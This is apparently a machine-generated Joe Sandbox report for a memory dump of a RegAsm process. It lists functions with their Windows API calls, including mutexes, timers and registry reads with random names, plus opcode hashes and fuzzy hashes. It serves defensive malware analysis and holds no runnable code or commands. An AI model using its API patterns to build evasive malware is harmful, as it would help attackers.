Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

LocalFree.KERNEL32(00000000), ref: 0040CEC0

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$TimerWaitable$EventLocal$CancelDebugEnvironmentErrorFreeLastMutexOutputStringVariablelstrlen$AllocChangeCloseFileFindInformationMappingNotificationReleaseResetTimeZonewsprintf
String ID:
API String ID: 2363488700-0
Opcode ID: 76d7663a51f1cc8663c0ec39d797f46e6d26e732ae52cf721b0894ac83a92147
Instruction ID: 5b0d0e73e1226a1d48c5652217f1ff514faf40f860b290d3e6735eacab86365f
Opcode Fuzzy Hash: 76d7663a51f1cc8663c0ec39d797f46e6d26e732ae52cf721b0894ac83a92147
Instruction Fuzzy Hash: 9AF06271600600EFE710ABA8EC09BEBBBF9FFC8714F008439EA06D7151D67499018A95

Uniqueness

Uniqueness Score: -1.00%

Function 00401639 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

_'@, xrefs: 00401643, 0040164F, 00401661, 0040167B

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: _'@
API String ID: 0-884491114
Opcode ID: 62c5eacd511d9bd0286bd1fb312c3155aab2c5f424a6ee9a99b24286b04b0023
Instruction ID: 9a2f12ced6f6809d0513f3e5e0ec14d95bc473e9e98c5950382a7a734661f5dc
Opcode Fuzzy Hash: 62c5eacd511d9bd0286bd1fb312c3155aab2c5f424a6ee9a99b24286b04b0023
Instruction Fuzzy Hash: B9018F71211622BFDB258B8ADC44EEB7FACEF4A7A0B040024F608D3360C6719D00CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040739F Relevance: 59.2, APIs: 47, Instructions: 472memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 004073CD
LocalAlloc.KERNEL32(00000040,00000000), ref: 00407421
LocalAlloc.KERNEL32(00000040,00000000), ref: 00407475
LocalAlloc.KERNEL32(00000040,00000000), ref: 004074C9

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 5768eaf72a6b6d18eedfd6d3d850491cd343ec9ee70d47a2829b717337e7dbe6
Instruction ID: aa608bd77a511a3ddcf80ac69c5d68bc3ea3093b3b88428faeb8409a32030196
Opcode Fuzzy Hash: 5768eaf72a6b6d18eedfd6d3d850491cd343ec9ee70d47a2829b717337e7dbe6
Instruction Fuzzy Hash: 03F16B32D01616EFDB159BE5DC48EEE7FB5FB88310B048065EA15B32A0DB346D01DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C15A Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 412timememoryCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0040C178
GetClientRect.USER32(?,?), ref: 0040C2EF
LocalAlloc.KERNEL32(00000000,00000BC9,00000000,?), ref: 0040C3DC
GetLastError.KERNEL32 ref: 0040C3E4
LocalFree.KERNEL32(00000000), ref: 0040C3EB
OutputDebugStringA.KERNEL32(teeol7lw0), ref: 0040C3F6
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_h7wl254h), ref: 0040C405
SetEvent.KERNEL32(00000000), ref: 0040C40E
ResetEvent.KERNEL32(00000000), ref: 0040C415
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pa5nd6cv), ref: 0040C423
CancelWaitableTimer.KERNEL32(00000000), ref: 0040C42E
LocalFree.KERNEL32(00000000), ref: 0040C4EB
CloseHandle.KERNEL32(?), ref: 0040C4F5
LocalFree.KERNEL32(?), ref: 0040C503
LocalFree.KERNEL32(?), ref: 0040C50C
LocalFree.KERNEL32(00000000), ref: 0040C5D7
LocalFree.KERNEL32(?), ref: 0040C5E0
LocalFree.KERNEL32(?), ref: 0040C5E9
LocalFree.KERNEL32(?), ref: 0040C5F0
LocalFree.KERNEL32(00000000), ref: 0040C5F7

Part of subcall function 0040B3DA: lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4C3
Part of subcall function 0040B3DA: lstrlenW.KERNEL32(?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4CA
Part of subcall function 0040B3DA: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4E9

ReleaseDC.USER32(00000000,00000000), ref: 0040C618
ReleaseDC.USER32(?,00000000), ref: 0040C622
LocalFree.KERNEL32(?), ref: 0040C632

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

Strings

ev_h7wl254h, xrefs: 0040C3FC
teeol7lw0, xrefs: 0040C3F1
WTMR_pa5nd6cv, xrefs: 0040C41B

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$EventTimerWaitable$Release$CancelDebugErrorLastOutputString$AllocCloseEnvironmentHandleMutexOpenResetSemaphoreVariablelstrlen$ClientDesktopFileMappingRectWindow
String ID: WTMR_pa5nd6cv$ev_h7wl254h$teeol7lw0
API String ID: 1026115749-3741897219
Opcode ID: 9b3bdaa1190550917a06e02a3a561dac915816b4139527f822832ac3fb9e216d
Instruction ID: 21d74fce23984860edf060affd158e4b441c6a502b83ec71da3ef7fae4716755
Opcode Fuzzy Hash: 9b3bdaa1190550917a06e02a3a561dac915816b4139527f822832ac3fb9e216d
Instruction Fuzzy Hash: 91E1FA71900604FFDB11DFE4DC84EEE7BB9EB8D700B108029FA19E72A0D77499419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DB2 Relevance: 33.4, APIs: 21, Strings: 1, Instructions: 420COMMON

Download Yara Rule

APIs

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

LocalFree.KERNEL32(?), ref: 00408EF3
LocalFree.KERNEL32(00000000), ref: 00408EFA
LocalFree.KERNEL32(?), ref: 00408F01
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00409016
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00409050
LocalFree.KERNEL32(00000000), ref: 00409068
LocalFree.KERNEL32(?), ref: 00409251
CloseHandle.KERNEL32(?), ref: 0040925A
LocalFree.KERNEL32(00000000), ref: 0040926C
LocalFree.KERNEL32(?), ref: 00409277
LocalFree.KERNEL32(00000000), ref: 00409283
LocalFree.KERNEL32(?), ref: 00409291

Strings

l(A, xrefs: 00408DCB

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Event$ByteCancelCharCloseDebugEnvironmentErrorHandleLastMultiMutexOpenOutputReleaseSemaphoreStringVariableWide$AllocFileMappingReset
String ID: l(A
API String ID: 639647249-3792319738
Opcode ID: 6c2e5ab347ea0dcbd89827ca1244c7af231a5ca446d52d762a886b865704079d
Instruction ID: bd68ba429ce62d2ea9d88fc7609d36d2ad3139e388d301e945caf8a1526559ae
Opcode Fuzzy Hash: 6c2e5ab347ea0dcbd89827ca1244c7af231a5ca446d52d762a886b865704079d
Instruction Fuzzy Hash: DEE15171A00606EFDB159FE4DC85AEEBBB5FF89310F108039E915B72A0DB749D018B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040973E Relevance: 33.3, APIs: 22, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00409769
LocalAlloc.KERNEL32(00000040,00000000), ref: 004097BD
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409811
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409865

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: e4232f2f698536b82cf5bab53ad5adb06b6d06626686c5776173673126d4ba0d
Instruction ID: 4bb3e64e58a5201c25aba6b82b1ba4f9ecd234a90966ec2042f23147324a420c
Opcode Fuzzy Hash: e4232f2f698536b82cf5bab53ad5adb06b6d06626686c5776173673126d4ba0d
Instruction Fuzzy Hash: E0A18572A00615EFDB119BE4DC85EEE7BB5FB88300B008479F915A72A1DB749D01DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FFE8 Relevance: 31.6, APIs: 25, Instructions: 345memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00410046
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410060
LocalAlloc.KERNEL32(00000040,00000000), ref: 0041007B
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410096
LocalAlloc.KERNEL32(00000040,00000000), ref: 004100B1

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 03c1c7a61b9abe7ae8024017a57489360482b1fbabf0edcdf789d2b8aaac5970
Instruction ID: 11524ebab8a14aa74c97d440e465f4c5a2ba8a4fd552360fa20472e745bdcb13
Opcode Fuzzy Hash: 03c1c7a61b9abe7ae8024017a57489360482b1fbabf0edcdf789d2b8aaac5970
Instruction Fuzzy Hash: 7BC13E76A00605EFDB059BE4DC49EEE7BB5FB8C310F048169F915A32A0DB745D40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406D6E Relevance: 30.3, APIs: 24, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6cbdc971daf90bfe4e119c3458ffc8c0949ae2806d03694ab9f0d9c97c5af9
Instruction ID: 4f1643dcfd30c6a50a91e920e49a988ff4d8f275d1b60a1b348a400ccb7e8a08
Opcode Fuzzy Hash: 8a6cbdc971daf90bfe4e119c3458ffc8c0949ae2806d03694ab9f0d9c97c5af9
Instruction Fuzzy Hash: 68A16D72A00606EFDB019BE8DC45EEE7BB5FB88310F108175F615F32A0DB7459109BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8AA Relevance: 30.3, APIs: 24, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0bc9c8987e81f5af0bed7abd057e8018f5b16637fcda6887a8114be031e623
Instruction ID: 5fd095dea32d1f3e5c6e388cd404f744093c6d97d12969734ecbefdca46d245b
Opcode Fuzzy Hash: 9b0bc9c8987e81f5af0bed7abd057e8018f5b16637fcda6887a8114be031e623
Instruction Fuzzy Hash: 2DA14B72A00605EFDB019BE8DC45EEE7BB5FB89310F108165F625E72A0DB7859019BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6FE Relevance: 30.3, APIs: 24, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6575d8e3145ca00d08c853a5676bb126d91b73aff8e71c6366558e30a903aa49
Instruction ID: 13da97832414a168592ce56d605b8e9f79e8c67bd7c74ebe53a79e624a953ced
Opcode Fuzzy Hash: 6575d8e3145ca00d08c853a5676bb126d91b73aff8e71c6366558e30a903aa49
Instruction Fuzzy Hash: E2A15172A00606EFDB019BE8DC85EEE7BB5FB89310F108275F615F71A0DB7459019BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D24A Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 321COMMON

Download Yara Rule

APIs

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

LocalFree.KERNEL32(00000000,?,?,0040D775), ref: 0040D317
wsprintfW.USER32 ref: 0040D3C7

Strings

?, xrefs: 0040D281

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$TimerWaitable$EventLocal$CancelDebugEnvironmentErrorFreeLastMutexOutputStringVariablelstrlen$AllocChangeCloseFileFindMappingNotificationReleaseResetwsprintf
String ID: ?
API String ID: 1281660598-1684325040
Opcode ID: c85ed4cdb27a911e22bdc762098ddb05c4bf50151425965aec539ab9d2665174
Instruction ID: a320b4627380f3cf421818fa9c49cbd6b3779f8cfa3f4d55fa2deee90516c08e
Opcode Fuzzy Hash: c85ed4cdb27a911e22bdc762098ddb05c4bf50151425965aec539ab9d2665174
Instruction Fuzzy Hash: 1CC10971900609EFDB01DFE5DC84EEEBBB9FF89354B108025FA15A7260D7749A04DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E0 Relevance: 16.5, APIs: 13, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a1bee02addfe5dd2053a5a197994deb9325e1396594b33a94f1d65e5165709
Instruction ID: ba87ff7ffdea6b00fdeabc2726f6f2bfad5139be0e12a858a036ad0614a95326
Opcode Fuzzy Hash: a6a1bee02addfe5dd2053a5a197994deb9325e1396594b33a94f1d65e5165709
Instruction Fuzzy Hash: 99815472900605FFDB00DBE5DC45EEE7BB9EB88314B10853AF915E72D0DB3899058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408B7F Relevance: 12.2, APIs: 8, Instructions: 186stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

LocalFree.KERNEL32(00000000), ref: 00408C2B
wsprintfW.USER32 ref: 00408D11
lstrlenW.KERNEL32 ref: 00408D1E
LocalFree.KERNEL32(004081BE), ref: 00408D3B
LocalFree.KERNEL32(?), ref: 00408D80
LocalFree.KERNEL32(00000000), ref: 00408D8B
LocalFree.KERNEL32(00000000), ref: 00408D97
LocalFree.KERNEL32(?), ref: 00408DA5

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseFileHandleMappingResetlstrlenwsprintf
String ID:
API String ID: 2351208061-0
Opcode ID: 0c9fcc38bcc6c0250805d2d4a2dc4acf08c46846df5a327a8a88ff051d70216a
Instruction ID: c9198239f7c2b5a66ba9cb46f8b1bed5498c225b6b076db5169d79ee3b3ce09a
Opcode Fuzzy Hash: 0c9fcc38bcc6c0250805d2d4a2dc4acf08c46846df5a327a8a88ff051d70216a
Instruction Fuzzy Hash: 39611D32900605FFDB159FA0EC85AEE7BB6EF88310F108139F915A72A0DB759940DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401ACC Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 00401B0D
PathCombineW.SHLWAPI(?,?), ref: 00401B32
LocalFree.KERNEL32(?), ref: 00401BE1
LocalFree.KERNEL32(?), ref: 00401C2B
CloseHandle.KERNEL32(?), ref: 00401C37
LocalFree.KERNEL32(?), ref: 00401C41
LocalFree.KERNEL32(00000000), ref: 00401C48
LocalFree.KERNEL32(?), ref: 00401C51

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal$CombinePath$CloseHandle
String ID:
API String ID: 2998194811-0
Opcode ID: 19f98ea32b6ef18ada5ff6ffdf8c7fb27f7198e15326513d4eaa2f1a065c4da8
Instruction ID: 745d95f4ba9b6c4e5cdb5560b762c09b7acc99d982d7be964736fae3e912c6fa
Opcode Fuzzy Hash: 19f98ea32b6ef18ada5ff6ffdf8c7fb27f7198e15326513d4eaa2f1a065c4da8
Instruction Fuzzy Hash: 8B512E75A00605EFDB15DFE4ED45EEE7BB8FB88300B108069FA04A7260DB749D10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407DE4 Relevance: 11.5, APIs: 9, Instructions: 275memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(01513DA0,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?,?), ref: 00407F1F
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?), ref: 00407F44
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?,?), ref: 00407FFF

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
